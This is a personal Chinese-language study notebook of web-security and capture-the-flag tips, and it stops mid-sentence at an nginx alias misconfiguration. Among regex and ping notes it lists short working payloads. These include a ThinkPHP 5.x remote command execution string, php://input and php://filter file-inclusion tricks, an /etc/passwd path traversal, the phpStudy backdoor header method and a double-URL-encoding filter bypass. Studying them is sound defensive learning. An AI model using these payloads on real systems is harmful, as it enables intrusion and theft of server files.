网络安全 常见问题&&知识点自我整理
\x35 \x开头一般为 Hex 编码
字符串格式化偏移漏洞 吃掉引号的方法 : var_dump(spritf("1%'#10s9","monkey"))
var_dump(spritf("%1$'10s","monkey"))
robots.txt
ThinkPHP 5.X payload-->
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令
文件包含 -->代码执行
条件:所包含文件为用户可控
payload:
可控变量=php://input &&
post提交:<?php 代码?>
经过查询php手册得知,对于编码后的字符串发送到服务器端,php总是会自动进行解码,而我们再使用urldecode函数就是进行了二次解码,虽然这个没问题,但是带来了安全隐患。 比如编码后的字符串%2527提交到后台,php首先进行一次自动解码,%25编码后是%,因此我们收到的字符串是%27,而如果这时我们调用了urldecode的话,会再次进行解码,%27变为’,这样就成功了躲过了我们过滤系统,
构造payload时,特殊字符需要转码(url编码) 如:# ? 等
正则表达式正,/i 大小写不敏感
[]匹配[]中列出的字符,注意,-为起始终止,见下
2[0-4]\d:表示20 or 21 or 22 or 23 or 24共5组数中的一组
|或者
25[0-5]表示250 or 251 or 252 or 253 or 254 or 255中的一个
[01]?表示,0 or 1中的一个
\.必须有一个.
{3}表示共有3组上述的数组
https://github.com/Mr-xn/BurpSuite-collections 2019渗透测试问题
ping -n 指定发包数量 windows
ping -c 指定发包数量 Linux
phpStudy后门详解:
漏洞版本:2016 2018
利用方式:请求头添加Accept-Charset:(base64编码之后的代码)
注意:需要把空格删掉
mysq支持使用 16进制数据 和二进制数据
0x开头表示16进制 0b开头表示二进制
file=php://filter/read=convert.base64-encode/resource=index.php
file 参数传递
php://filter本地文件访问协议
/read=convert.base64-encode/ 以base64读取的方式是base64编码后
ext3 Linux日志加载文件
WordPress < 3.6.1 PHP 对象注入漏洞
php反序列化unserialize小特性:
'O:+4:"test":1:{s:1:"a";s:3:"aaa";}' 和 'O:4:"test":1:{s:1:"a";s:3:"aaa";}') 结果相同
pyc反编译py文件网址::https://tool.lu/pyc
PHP-- $_SESSION[]接受的参数如果可控,可以传递参数为列表[true,true,true,true,true]
在php的比较中,
true == '123' 为真
true === '123' 为假
git源码泄露处理方式:
使用githack工具下载 工具链接:https://github.com/lijiejie/GitHack
利用.git文件恢复网站版本
Django使用的是gbk编码,超过%F7的编码不在gbk中有意义
当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。
路径穿越漏洞 + 任意文件读取:在访问文件的过程中,使用../../../../../../etc/passwd的方式控制访问路径,达到任意文件读取的效果
当访问的路径是一个文件夹的时候,会导入文件夹中的文件内容
当配置etc/nginx/sites-enabled/site.conf配置了localhost /web - img{ alias /iamges/; autoindex on 的时候,访问http://127.0.0.1/web-img../会自动